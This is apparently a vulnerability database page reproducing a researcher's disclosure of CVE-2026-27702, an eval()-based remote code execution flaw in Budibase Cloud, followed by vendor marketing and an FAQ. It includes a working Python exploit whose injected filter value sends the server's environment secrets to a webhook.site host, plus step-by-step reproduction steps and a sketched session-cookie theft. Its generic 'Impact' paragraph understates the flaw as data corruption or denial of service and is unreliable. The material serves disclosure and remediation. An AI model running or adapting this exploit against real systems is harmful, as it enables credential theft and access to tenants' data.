Summary
A critical unsafe eval() vulnerability in Budibase's view filtering implementation allows any authenticated user (including free tier accounts) to execute arbitrary JavaScript code on the server. This vulnerability ONLY affects Budibase Cloud (SaaS) - self-hosted deployments use native CouchDB views and are not vulnerable. The vulnerability exists in packages/server/src/db/inMemoryView.ts where user-controlled view map functions are directly evaluated without sanitization.
The primary impact comes from what lives inside the pod's environment: the app-service pod runs with secrets baked into its environment variables, including INTERNAL_API_KEY, JWT_SECRET, CouchDB admin credentials, AWS keys, and more. Using the extracted CouchDB credentials, we verified direct database access, enumerated all tenant databases, and confirmed that user records (email addresses) are readable.
Details
Root Cause
File: packages/server/src/db/inMemoryView.ts:28
export async function runView(
view: DBView,
calculation: string,
group: boolean,
data: Row[]
) {
// ...
let fn = (doc: Document, emit: any) => emit(doc._id)
// BUDI-7060 -> indirect eval call appears to cause issues in cloud
eval("fn = " + view?.map?.replace("function (doc)", "function (doc, emit)")) // UNSAFE EVAL
// ...
}
Why Only Cloud is Vulnerable:
File: packages/server/src/sdk/workspace/rows/search/internal/internal.ts:194-221
if (env.SELF_HOSTED) {
// Self-hosted: Uses native CouchDB design documents - NO EVAL
response = await db.query(`database/${viewName}`, {
include_docs: !calculation,
group: !!group,
})
} else {
// Cloud: Uses in-memory PouchDB with UNSAFE EVAL
const tableId = viewInfo.meta!.tableId
const data = await fetchRaw(tableId!)
response = await inMemoryViews.runView( // <- Calls vulnerable function
viewInfo,
calculation as string,
!!group,
data
)
}
The view.map parameter comes directly from user input when creating table views with filters. The code constructs a string by concatenating "fn = " with the user-controlled map function and passes it to eval(), allowing arbitrary JavaScript execution in the Node.js server context.
Self-hosted deployments are not affected because they use native CouchDB design documents instead of the in-memory eval() path.
Attack Flow
- Authenticated user creates a table view with custom filter
- Frontend sends POST request to
/api/viewswith malicious payload in filter value - Backend stores view configuration in CouchDB
- When view is queried (GET
/api/views/{viewName}),runView()is called - Malicious code is
eval()'d on server - RCE achieved
Exploitation Vector
The vulnerability is triggered via the view filter mechanism. When creating a view with a filter condition, the filter value can be injected with JavaScript code that breaks out of the intended expression context:
Malicious filter value:
x" || (MALICIOUS_CODE_HERE, true) || "
This payload:
- Closes the expected string context with
x" - Uses
||(OR operator) to inject arbitrary code - Returns
trueto make the filter always match - Closes with
|| ""to maintain valid syntax
Verified on Production
Tested on own Budibase Cloud account (y4ylfy7m.budibase.app,) to confirm severity. Testing was deliberately limited - no customer data was retained and exploitation was stopped once impact was confirmed:
- Achieved RCE on
app-servicepod (hostname:app-service-5f4f6d796d-p6dhz, Kubernetes,eu-west-1) - Extracted
process.env- confirmed presence of platform secrets (JWT_SECRET,INTERNAL_API_KEY,COUCH_DB_URL,MINIO_ACCESS_KEY, etc.) - Used extracted
COUCH_DB_URLcredentials to verify CouchDB access - enumerated database list (489,827 databases) to confirm scale of impact - Queried users table to confirm data is readable (retrieved email addresses)
- Uploaded an HTML file as a PoC artifact to confirm write access.
Proof of Concept
PoC Script
import requests, time
from urllib.parse import urlparse
# Config | CHANGE THESE
URL = "https://[YOUR-TENANT].budibase.app"
WEBHOOK = "https://webhook.site/[YOUR-WEBHOOK-ID]"
JWT = "[YOUR-JWT-TOKEN]" # budibase:auth cookie value
APP_ID = "app_dev_[TENANT]_[APP-UUID]" # x-budibase-app-id header
TABLE_ID = "[YOUR-TABLE-ID]" # any table ID (e.g. ta_users)
# Payload - parses hostname/path from WEBHOOK automatically
webhook_parsed = urlparse(WEBHOOK)
view = f"RCE_{int(time.time())}"
payload = f'''x" || (require('https').request({{hostname:'{webhook_parsed.hostname}',path:'{webhook_parsed.path}',method:'POST'}}).end(JSON.stringify(process.env)), true) || "'''
# Exploit
s = requests.Session()
s.cookies.set('budibase:auth', JWT)
s.headers.update({"x-budibase-app-id": APP_ID, "Content-Type": "application/json"})
print(f"[*] Creating view...")
s.post(f"{URL}/api/views", json={"tableId": TABLE_ID, "name": view, "filters": [{"key": "email", "condition": "EQUALS", "value": payload}]})
print(f"[*] Triggering RCE...")
s.get(f"{URL}/api/views/{view}")
print(f"[+] Done! Check: {WEBHOOK}")
Video Demo
https://github.com/user-attachments/assets/cd12e1ab-02fd-4d0d-9fb5-d78bb83cdf99
Reproduction Steps
Prerequisites:
- Create free Budibase Cloud account at https://budibase.app
- Create a new app
- Create a table with at least one text field
Exploitation:
- Copy the PoC script above
- Replace placeholders with your tenant URL, app ID, table ID
- Get your JWT token from browser cookies (
budibase:auth) - Create a webhook at https://webhook.site for exfiltration
- Run the script:
python3 budibase_rce_poc.py
Verification:
- Check webhook.site - you'll receive all server environment variables
- Extracted data includes JWT_SECRET, INTERNAL_API_KEY, database credentials
Additional Note
The budibase:auth session cookie has Domain=.budibase.app (leading dot = all subdomains) and no HttpOnly flag, making it readable by JavaScript. Since the RCE allows uploading arbitrary HTML files to any subdomain (as demonstrated with the PoC artifact), an attacker could serve an XSS payload from their own tenant subdomain and steal session cookies from any Budibase Cloud user who visits that page (one click ATO).
Responsible Disclosure Statement
This vulnerability was discovered during independent security research. Testing was conducted on a personal free-tier account only. Exploitation was deliberately limited to what was necessary to confirm the vulnerability and its impact:
- No customer data was accessed beyond enumerating database names and confirming that user records (email addresses) are readable
- The PoC HTML file uploaded to confirm write access is benign
- This report is being submitted directly to Budibase security with no plans for public disclosure until a fix is in place
- Before any public disclosure, this report must be redacted/simplified - all credentials, hostnames, internal API keys, tenant IDs, and other sensitive platform details included here for Budibase's remediation purposes must be removed or redacted
Impact
The application does not adequately validate input before processing it, allowing unexpected values to reach sensitive code paths. Typical impact: varies by context: data corruption, logic bypass, or denial of service.
CVE-2026-27702 has a CVSS score of 9.9 (Critical). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (3.30.4); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-27702? CVE-2026-27702 is a critical-severity improper input validation vulnerability in budibase (npm), affecting versions < 3.30.4. It is fixed in 3.30.4. The application does not adequately validate input before processing it, allowing unexpected values to reach sensitive code paths.
- How severe is CVE-2026-27702? CVE-2026-27702 has a CVSS score of 9.9 (Critical). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of budibase are affected by CVE-2026-27702? budibase (npm) versions < 3.30.4 is affected.
- Is there a fix for CVE-2026-27702? Yes. CVE-2026-27702 is fixed in 3.30.4. Upgrade to this version or later.
- Is CVE-2026-27702 exploitable, and should I be worried? Whether CVE-2026-27702 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-27702 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-27702? Upgrade
budibaseto 3.30.4 or later.